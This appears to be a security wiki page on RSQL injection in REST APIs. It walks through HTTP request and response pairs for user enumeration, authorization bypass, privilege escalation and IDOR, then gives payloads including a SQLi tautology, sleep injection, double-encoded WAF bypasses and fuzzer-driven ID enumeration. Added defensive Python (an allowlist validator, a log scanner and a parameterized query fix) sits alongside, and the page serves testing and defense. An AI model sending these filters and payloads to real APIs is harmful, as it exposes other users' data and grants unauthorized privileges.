RSQL Injection

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

What is RSQL?

RSQL is a query language designed for parameterized filtering of input in RESTful APIs. It is based on FIQL (Feed Item Query Language), originally specified by Mark Nottingham for querying Atom feeds, and stands out for its simplicity and its ability to express complex queries in a compact, URI-compatible form over HTTP. That makes it a good choice as a general-purpose query language for searching REST endpoints.

Overview

RSQL Injection is a vulnerability in web applications that use RSQL as the query language of their RESTful APIs. Much like SQL Injection and LDAP Injection, it arises when RSQL filters are not properly sanitized, allowing an attacker to inject malicious queries in order to read, modify or delete data without authorization.

How does it work?

RSQL lets you compose advanced queries against RESTful APIs, for example:

/products?filter=price>100;category==electronics

This translates into a structured query that filters products with a price greater than 100 and the category "electronics".

If the application does not validate user input properly, an attacker can manipulate the filter and execute unexpected queries, such as:

/products?filter=id=in=(1,2,3);delete_all==true

Or even exploit it to extract sensitive information through Boolean queries or nested subqueries.

Risks

  • Exposure of sensitive data: the attacker can obtain information that should not be accessible.
  • Data modification or deletion: injecting filters that change records in the database.
  • Privilege escalation: manipulating role-granting identifiers through filters to trick the application into acting with other users' privileges.
  • Access-control bypass: manipulating filters to reach restricted data.
  • Impersonation or IDOR: swapping identifiers between users through filters, which grants access to other users' information and resources without proper authentication.

Supported RSQL operators

| Operator | Description | Example |
|---|---|---|
| ; / and | Logical AND operator. Filters rows where both conditions are true | /api/v2/myTable?q=columnA==valueA;columnB==valueB |
| , / or | Logical OR operator. Filters rows where at least one of the conditions is true | /api/v2/myTable?q=columnA==valueA,columnB==valueB |
| == | Equals query. Returns all rows from myTable where the values in columnA exactly match queryValue | /api/v2/myTable?q=columnA==queryValue |
| =q= | Search query. Returns all rows from myTable where the values in columnA contain queryValue | /api/v2/myTable?q=columnA=q=queryValue |
| =like= | Like query. Returns all rows from myTable where the values in columnA are like queryValue | /api/v2/myTable?q=columnA=like=queryValue |
| =in= | In query. Returns all rows from myTable where columnA contains valueA OR valueB | /api/v2/myTable?q=columnA=in=(valueA, valueB) |
| =out= | Exclude query. Returns all rows from myTable where the values in columnA are neither valueA nor valueB | /api/v2/myTable?q=columnA=out=(valueA,valueB) |
| != | Not-equals query. Returns all rows from myTable where the values in columnA are not equal to queryValue | /api/v2/myTable?q=columnA!=queryValue |
| =notlike= | Not-like query. Returns all rows from myTable where the values in columnA are not like queryValue | /api/v2/myTable?q=columnA=notlike=queryValue |
| < & =lt= | Less-than query. Returns all rows from myTable where the values in columnA are less than queryValue | /api/v2/myTable?q=columnA<queryValue or /api/v2/myTable?q=columnA=lt=queryValue |
| =le= & <= | Less-than-or-equal query. Returns all rows from myTable where the values in columnA are less than or equal to queryValue | /api/v2/myTable?q=columnA<=queryValue or /api/v2/myTable?q=columnA=le=queryValue |
| > & =gt= | Greater-than query. Returns all rows from myTable where the values in columnA are greater than queryValue | /api/v2/myTable?q=columnA>queryValue or /api/v2/myTable?q=columnA=gt=queryValue |
| >= & =ge= | Greater-than-or-equal query. Returns all rows from myTable where the values in columnA are equal to or greater than queryValue | /api/v2/myTable?q=columnA>=queryValue or /api/v2/myTable?q=columnA=ge=queryValue |
| =rng= | Range query. Returns all rows from myTable where the values in columnA are equal to or greater than fromValue and less than or equal to toValue | /api/v2/myTable?q=columnA=rng=(fromValue,toValue) |

Note: table based on information from the MOLGENIS and rsql-parser applications.

Examples

  • name=="Kill Bill";year=gt=2003
  • name=="Kill Bill" and year>2003
  • genres=in=(sci-fi,action);(director=='Christopher Nolan',actor==*Bale);year=ge=2000
  • genres=in=(sci-fi,action) and (director=='Christopher Nolan' or actor==*Bale) and year>=2000
  • director.lastName==Nolan;year=ge=2000;year=lt=2010
  • director.lastName==Nolan and year>=2000 and year<2010
  • genres=in=(sci-fi,action);genres=out=(romance,animated,horror),director==Que*Tarantino
  • genres=in=(sci-fi,action) and genres=out=(romance,animated,horror) or director==Que*Tarantino

Note: examples based on information from the rsql-parser application.
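The server-side counterpart to the operator table and the risks listed earlier, as an added example that is neither part of this page nor code from rsql-parser or MOLGENIS: a small recursive-descent parser for the grammar above (the ; and , logical operators and their and/or keyword forms, parenthesised groups, quoted values, and =op=(a,b) argument lists), followed by a validator that accepts only properties and operators explicitly allowlisted per resource. The resource name users, its allowlisted properties and the wildcard rule are assumptions chosen for the demonstration; dotted relation paths such as user.id are rejected simply because they are absent from the allowlist.

```python
import re

class RSQLError(ValueError): pass

# One alternative per token kind: reserved punctuation, the operators from the table above,
# double- or single-quoted values, and unreserved words (selectors, bare values, and/or keywords).
_TOKEN_RE = re.compile(r"""\s*(?:(?P<punct>[();,])|(?P<op>==|!=|=[a-zA-Z]+=|<=|>=|<|>)
                           |"(?P<dq>[^"]*)"|'(?P<sq>[^']*)'|(?P<word>[^"'();,=!~<>\s]+))""", re.VERBOSE)

def tokenize(text):
    """Return (kind, value) tokens; kind is punct, op, quoted or word."""
    tokens, pos, text = [], 0, text.rstrip()
    while pos < len(text):
        m = _TOKEN_RE.match(text, pos)
        if not m:
            raise RSQLError(f"bad token at offset {pos}")
        kind = m.lastgroup
        tokens.append(("quoted" if kind in ("dq", "sq") else kind, m.group(kind)))
        pos = m.end()
    return tokens

class Parser:
    """Recursive descent; nodes are ('and', [...]), ('or', [...]) or ('cmp', selector, op, [values])."""
    def __init__(self, text):
        self.toks, self.pos = tokenize(text), 0
    def peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else (None, None)
    def take(self, expected=None):
        tok = self.peek()
        if expected is not None and tok != expected:
            raise RSQLError(f"expected {expected[1]!r}, got {tok[1]!r}")
        self.pos += 1
        return tok
    def parse(self):
        node = self.parse_or()
        if self.peek()[0] is not None:
            raise RSQLError("unexpected trailing input")
        return node
    def parse_or(self):          # or := and ((',' | 'or') and)*
        items = [self.parse_and()]
        while self.peek() in (("punct", ","), ("word", "or")):
            self.take(); items.append(self.parse_and())
        return items[0] if len(items) == 1 else ("or", items)
    def parse_and(self):         # and := constraint ((';' | 'and') constraint)*
        items = [self.parse_constraint()]
        while self.peek() in (("punct", ";"), ("word", "and")):
            self.take(); items.append(self.parse_constraint())
        return items[0] if len(items) == 1 else ("and", items)
    def parse_constraint(self):  # constraint := '(' or ')' | selector op arguments
        if self.peek() == ("punct", "("):
            self.take(); node = self.parse_or(); self.take(("punct", ")")); return node
        kind, selector = self.take()
        if kind != "word":
            raise RSQLError(f"expected selector, got {selector!r}")
        kind, op = self.take()
        if kind != "op":
            raise RSQLError(f"expected operator after {selector!r}")
        return ("cmp", selector, op, self.parse_arguments())
    def parse_arguments(self):   # a single value, or '(' value (',' value)* ')'
        if self.peek() != ("punct", "("):
            return [self.parse_value()]
        self.take(); values = [self.parse_value()]
        while self.peek() == ("punct", ","):
            self.take(); values.append(self.parse_value())
        self.take(("punct", ")"))
        return values
    def parse_value(self):
        kind, value = self.take()
        if kind not in ("word", "quoted"):
            raise RSQLError(f"expected value, got {value!r}")
        return value

# Assumed per-resource allowlist: which properties may be filtered, and with which operators.
# Relation paths such as user.id or customer.email are absent, so they are rejected outright.
ALLOWED_FILTERS = {"users": {"status": {"==", "!=", "=in="},
                             "createdAt": {"=gt=", "=ge=", "=lt=", "=le=", "=rng="},
                             "firstName": {"==", "=like="}}}
WILDCARD_OPS = {"=like=", "=notlike="}  # '*' is only honoured through an explicit like operator

def validate(node, allowed, problems):
    """Collect every property or operator use that falls outside the allowlist."""
    if node[0] in ("and", "or"):
        for child in node[1]:
            validate(child, allowed, problems)
        return
    _, selector, op, values = node
    if selector not in allowed:
        problems.append(f"property not filterable: {selector}")
    elif op not in allowed[selector]:
        problems.append(f"operator {op} not allowed on {selector}")
    elif op not in WILDCARD_OPS and any("*" in v for v in values):
        problems.append(f"wildcard not allowed with {op} on {selector}")

def check_filter(text, resource):
    """[] if the client filter may run against `resource`, else the reasons to reject it."""
    problems = []
    try:
        validate(Parser(text).parse(), ALLOWED_FILTERS[resource], problems)
    except RSQLError as exc:
        problems.append(f"syntax: {exc}")
    return problems
```

The validator walks the whole tree, so a disallowed comparison hidden inside a parenthesised OR branch is reported just like a top-level one, and a parse failure is returned as a reason rather than leaking the parser's message to the client.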

Common filters

These filters help narrow down queries in APIs:

| Filter | Description | Example |
|---|---|---|
| filter[users] | Filters results by specific users | /api/v2/myTable?filter[users]=123 |
| filter[status] | Filters by status (active/inactive, completed, etc.) | /api/v2/orders?filter[status]=active |
| filter[date] | Filters results within a date range | /api/v2/logs?filter[date]=gte:2024-01-01 |
| filter[category] | Filters by category or resource type | /api/v2/products?filter[category]=electronics |
| filter[id] | Filters by unique identifier | /api/v2/posts?filter[id]=42 |

Common parameters

These parameters help shape the API response:

| Parameter | Description | Example |
|---|---|---|
| include | Includes related resources in the response | /api/v2/orders?include=customer,items |
| sort | Sorts results in ascending or descending order | /api/v2/users?sort=-created_at |
| page[size] | Controls the number of results per page | /api/v2/products?page[size]=10 |
| page[number] | Specifies the page number | /api/v2/products?page[number]=2 |
| fields[resource] | Defines which fields to return in the response | /api/v2/users?fields[users]=id,name,email |
| search | Performs a more flexible search | /api/v2/posts?search=technology |

Information leak and user enumeration

The following request shows a registration endpoint that requires an email parameter in order to check whether a user is registered with that email, returning true or false depending on whether it exists in the database:

Request

GET /api/registrations HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 400
Date: Sat, 22 Mar 2025 14:47:14 GMT
Content-Type: application/vnd.api+json
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 85

{
"errors": [{
"code": "BLANK",
"detail": "Missing required param: email",
"status": "400"
}]
}

Although /api/registrations?email=<emailAccount> is what the endpoint expects, RSQL filters can be used to try to enumerate and/or extract user information through the special operators:

Request

GET /api/registrations?filter[userAccounts]=email=='test@test.com' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://locahost:3000
Connection: keep-alive
Referer: https://locahost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:09:38 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 38
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *

{
"data": {
"attributes": {
"tenants": []
}
}
}

If the filter matches a valid email account, the application returns the user's information instead of the classic "true", "1" or similar in the server response:

Request

GET /api/registrations?filter[userAccounts]=email=='manuel**********@domain.local' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:19:46 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 293
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *

{
"data": {
"id": "********************",
"type": "UserAccountDTO",
"attributes": {
"id": "********************",
"type": "UserAccountDTO",
"email": "manuel**********@domain.local",
"sub": "*********************",
"status": "ACTIVE",
"tenants": [{
"id": "1"
}]
}
}
}

Authorization bypass

In this scenario we start from a user with a basic role who lacks the privileged permissions (e.g. administrator) needed to access the list of all users registered in the database:

Request

GET /api/users HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 403
Date: Sat, 22 Mar 2025 14:40:07 GMT
Content-Length: 0
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *

Again we use filters and special operators that give us an alternative way to obtain information about users and bypass access control. For example, filter the users whose user ID contains the letter "a":

Request

GET /api/users?filter[users]=id=in=(*a*) HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:43:28 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 1434192
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *

{
"data": [{
"id": "********A***********",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "************",
"email": "**********@domain.local",
"firstName": "rafael",
"surname": "************",
"telephoneCountryCode": "**",
"mobilePhone": "*********",
"taxIdentifier": "********",
"languageId": 1,
"createdAt": "2024-08-09T10:57:41.237Z",
"termsOfUseAccepted": true,
"id": "******************",
"type": "UserGetResponseCustomDTO"
}
}, {
"id": "*A*******A*****A*******A******",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "************",
"email": "juan*******@domain.local",
"firstName": "juan",
"surname": "************",
"telephoneCountryCode": "**",
"mobilePhone": "************",
"taxIdentifier": "************",
"languageId": 1,
"createdAt": "2024-07-18T06:07:37.68Z",
"termsOfUseAccepted": true,
"id": "*******************",
"type": "UserGetResponseCustomDTO"
}
}, {
................

Privilege Escalation

It is very common to come across endpoints that check a user's privileges through their role. For example, here we have a user with no privileges:

Request

GET /api/companyUsers?include=role HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb......
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:08 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 11
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *

{
"data": []
}

Using certain operators we could enumerate administrator users:

Request

GET /api/companyUsers?include=role&filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJh.....
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:45 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 361
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *

{
"data": [{
"type": "CompanyUserGetResponseDTO",
"attributes": {
"companyId": "FA**************",
"companyTaxIdentifier": "B999*******",
"bizName": "company sl",
"email": "jose*******@domain.local",
"userRole": {
"userRoleId": 1,
"userRoleKey": "general.roles.admin"
},
"companyCountryTranslationKey": "*******",
"type": "CompanyUserGetResponseDTO"
}
}]
}

Once the administrator's identifier is known, privilege escalation is possible by replacing or adding the corresponding filter with the administrator's identifier and obtaining the same privileges:

Request

GET /api/functionalities/allPermissionsFunctionalities?filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ.....
Origin: https:/localhost:3000
Connection: keep-alive
Referer: https:/localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200
Date: Sat, 22 Mar 2025 18:53:00 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 68833
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *

{
"meta": {
"Functionalities": [{
"functionalityId": 1,
"permissionId": 1,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.userProfile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 2,
"permissionId": 2,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.my_profile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 3,
"permissionId": 3,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "layout.change_user_data",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 4,
"permissionId": 4,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.configuration",
"type": "FunctionalityPermissionDTO"
}, {
....
}]
}
}

Impersonate or Insecure Direct Object References (IDOR)

Besides the filter parameter, other parameters can be used, e.g. include, which allows specific fields (e.g. language, country, password…) to be included in the result.

The following example shows the information of our own user profile:

Request

GET /api/users?include=language,country HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ...
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:47:27 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 540
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *

{
"data": [{
"id": "D5********************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "**********",
"email": "domingo....@domain.local",
"firstName": "Domingo",
"surname": "**********",
"telephoneCountryCode": "**",
"mobilePhone": "******",
"languageId": 1,
"createdAt": "2024-03-11T07:24:57.627Z",
"termsOfUseAccepted": true,
"howMeetUs": "**************",
"id": "D5********************",
"type": "UserGetResponseCustomDTO"
}
}]
}

A combination of filters can be used to bypass authorization controls and gain access to other users' profiles:

Request

GET /api/users?include=language,country&filter[users]=id=='94***************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ...
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:50:07 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 520
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *

{
"data": [{
"id": "94******************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 2,
"translationKey": "**************",
"email": "jose******@domain.local",
"firstName": "jose",
"surname": "***************",
"telephoneCountryCode": "**",
"mobilePhone": "********",
"taxIdentifier": "*********",
"languageId": 1,
"createdAt": "2024-11-21T08:29:05.833Z",
"termsOfUseAccepted": true,
"id": "94******************",
"type": "UserGetResponseCustomDTO"
}
}]
}

Discovery and fuzzing: quick wins

  • Check for RSQL support by sending harmless probes such as ?filter=id==test, ?q==test or malformed operators like =foo=; verbose APIs often leak parser errors ("Unknown operator" / "Unknown property").
  • Many implementations parse URL parameters twice; try double-encoding (, ), *, ; (e.g. %2528admin%2529) to bypass naive blocklists and WAFs.
  • Boolean exfiltration with wildcards: filter[users]=email==*%@example.com;status==ACTIVE, then switch the logic to , (OR) and compare response sizes.
  • Range/proximity leaks: filter[users]=createdAt=rng=(2024-01-01,2025-01-01) enumerates quickly by year without knowing exact IDs.
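Detection logic for the probe patterns in the list above, run over constructed access-log lines; this is an added example and not part of the page. It decodes each filter*/q query parameter exactly once and flags wildcards, dotted relation selectors, a surviving second layer of percent-encoding, and any operator outside the set in the operator table. The log format, client addresses, request paths and the KNOWN_OPS set are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the page); the paths echo the request shapes shown above.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Mar/2025:14:09:38 +0000] "GET /api/registrations?email=alice%40example.com HTTP/1.1" 200 38
10.0.0.5 - - [22/Mar/2025:14:19:46 +0000] "GET /api/registrations?filter[userAccounts]=email%3D%3D%27alice%40example.com%27 HTTP/1.1" 200 293
10.0.0.7 - - [22/Mar/2025:14:43:28 +0000] "GET /api/users?filter[users]=id%3Din%3D(*a*) HTTP/1.1" 200 1434192
10.0.0.7 - - [22/Mar/2025:19:13:45 +0000] "GET /api/companyUsers?include=role&filter[companyUsers]=user.id%3D%3D%2794abc%27 HTTP/1.1" 200 361
10.0.0.9 - - [22/Mar/2025:20:01:02 +0000] "GET /api/users?filter[users]=id%3D%3D%2528admin%2529 HTTP/1.1" 400 85
10.0.0.9 - - [22/Mar/2025:20:02:10 +0000] "GET /api/products?filter=name%3Dfoo%3Dtest HTTP/1.1" 400 60
"""

# Operators from the operator table; anything else is a probe for a custom operator.
KNOWN_OPS = {"==", "!=", "=q=", "=like=", "=notlike=", "=in=", "=out=",
             "=lt=", "=le=", "=gt=", "=ge=", "=rng=", "<", "<=", ">", ">="}
_OP_RE = re.compile(r"==|!=|=[a-zA-Z]+=|<=|>=|<|>")
# A selector containing a dot (user.id, customer.email) traverses a relation.
_RELATION_RE = re.compile(r"(?:^|[;,(\s])[A-Za-z_]\w*\.[A-Za-z_]")
_REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE) (\S+) HTTP/')

def analyse_filter(value):
    """Return the reasons a once-decoded filter value looks suspicious ([] if none)."""
    reasons = []
    if "*" in value:
        reasons.append("wildcard")
    if _RELATION_RE.search(value):
        reasons.append("relation-path selector")
    if unquote(value) != value:  # escapes survived the first decode: double-encoded
        reasons.append("double-encoded")
    for op in _OP_RE.findall(value):
        if op not in KNOWN_OPS:
            reasons.append(f"unknown operator {op}")
    return reasons

def filter_params(url):
    """Yield (name, decoded value) for the query parameters that carry RSQL: filter*, q."""
    for part in urlsplit(url).query.split("&"):
        name, _, raw = part.partition("=")  # '=' inside values is still percent-encoded here
        name = unquote(name)
        if name == "q" or name.startswith("filter"):
            yield name, unquote(raw)

def scan_log(text):
    """One (url, param, reasons) finding per request whose RSQL filter trips a rule."""
    findings = []
    for line in text.splitlines():
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        for name, value in filter_params(m.group(1)):
            reasons = analyse_filter(value)
            if reasons:
                findings.append((m.group(1), name, reasons))
    return findings

if __name__ == "__main__":
    for url, name, reasons in scan_log(SAMPLE_LOG):
        print(f"{name}: {', '.join(reasons)}  <- {url}")
```

The second sample line (a well-formed email==... filter on the registration endpoint) is deliberately not flagged: content rules alone cannot tell it from a legitimate query, so that enumeration is better caught by rate-based alerting on the endpoint or by the endpoint rejecting filter parameters it never documented.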

Framework-specific abuses (Elide / JPA Specification / JSON:API)

  • Elide and many Spring Data REST projects translate RSQL directly into JPA Criteria. When developers add custom operators (e.g. =ilike=) and build the predicate by string concatenation instead of prepared parameters, you can pivot to SQLi (classic payload: name=ilike='%%' OR 1=1--').
  • The Elide analytic data store accepts parameterized columns; combining user-controlled analytic params with RSQL filters was the cause of the SQLi in CVE-2022-24827. Even where patched versions parameterize properly, similar bespoke code often remains: look for @JoinFilter/@ReadPermission SpEL expressions containing ${} and try injecting ';sleep(5);' or logical tautologies.
  • JSON:API backends often expose both include and filter. Filtering on related resources, filter[orders]=customer.email==*admin*, can bypass top-level ACLs because relation-level filters are executed before ownership checks.
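The concatenated custom-operator predicate from the first bullet next to its parameterized form, plus the server-side tenant scoping that the authorization-bypass, privilege-escalation and IDOR sections earlier on this page all turn on. This is an added example on SQLite, not code from Elide, Spring Data or this page; the table layout, sample rows and the shape of the principal (a dict holding the company_id taken from a verified token) are constructed. SQLite's LIKE is case-insensitive for ASCII, so it stands in for the ILIKE behind an =ilike= operator.

```python
import sqlite3

def make_db():
    """In-memory table with constructed rows spanning two tenants (sample data, not from the page)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT, name TEXT, email TEXT, company_id TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        ("u1", "Alice", "alice@acme.example", "acme", "admin"),
        ("u2", "Bob", "bob@acme.example", "acme", "member"),
        ("u3", "Carol", "carol@other.example", "other", "admin"),
    ])
    return db

# Vulnerable: the custom =ilike= operator is rendered by string concatenation, so a quote in
# the value closes the literal and whatever follows is executed as SQL.
def ilike_predicate_vulnerable(column, value):
    return f"{column} LIKE '{value}'", ()

# Hardened: the column must come from an allowlist and the value is bound as a parameter,
# so it can only ever be a LIKE pattern, never SQL.
FILTERABLE = {"name", "email"}

def ilike_predicate_safe(column, value):
    if column not in FILTERABLE:
        raise ValueError(f"column not filterable: {column}")
    return f"{column} LIKE ?", (value,)

def find_users(db, principal, column, value, build=ilike_predicate_safe):
    """Apply one client comparison, always scoped to the caller's own tenant.
    `principal` is the identity from the verified token (assumed shape: {'company_id': ...});
    the scope predicate is added here, server-side, so no client filter can drop or widen it."""
    where, params = build(column, value)
    sql = f"SELECT id FROM users WHERE company_id = ? AND {where}"
    rows = db.execute(sql, (principal["company_id"],) + params)
    return sorted(row[0] for row in rows)

if __name__ == "__main__":
    db, me = make_db(), {"company_id": "acme"}
    print(find_users(db, me, "name", "%o%"))                                        # ['u2']
    print(find_users(db, me, "name", "%%' OR 1=1--'", ilike_predicate_vulnerable))  # ['u1', 'u2', 'u3']
    print(find_users(db, me, "name", "%%' OR 1=1--'"))                              # []
```

With the concatenated builder the tautology turns the WHERE clause into (company_id = ? AND name LIKE '%%') OR 1=1, which returns the other tenant's row as well; with the bound parameter the same input is just a LIKE pattern that matches nothing, and the tenant scope is never part of the client-controlled text.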

Automation helpers

  • rsql-parser CLI (Java): java -jar rsql-parser.jar "name=='*admin*';status==ACTIVE" validates payloads locally and prints the abstract syntax tree; useful for crafting balanced parentheses and custom operators.
  • Python quick builder:
    from pyrsql import RSQL
    payload = RSQL().and_("email==*admin*", "status==ACTIVE").or_("role=in=(owner,admin)")
    print(str(payload))
  • Chain with an HTTP fuzzer (ffuf, turbo-intruder) iterating wildcard positions *a*, *e*, etc. inside =in= lists to enumerate IDs and email addresses quickly.
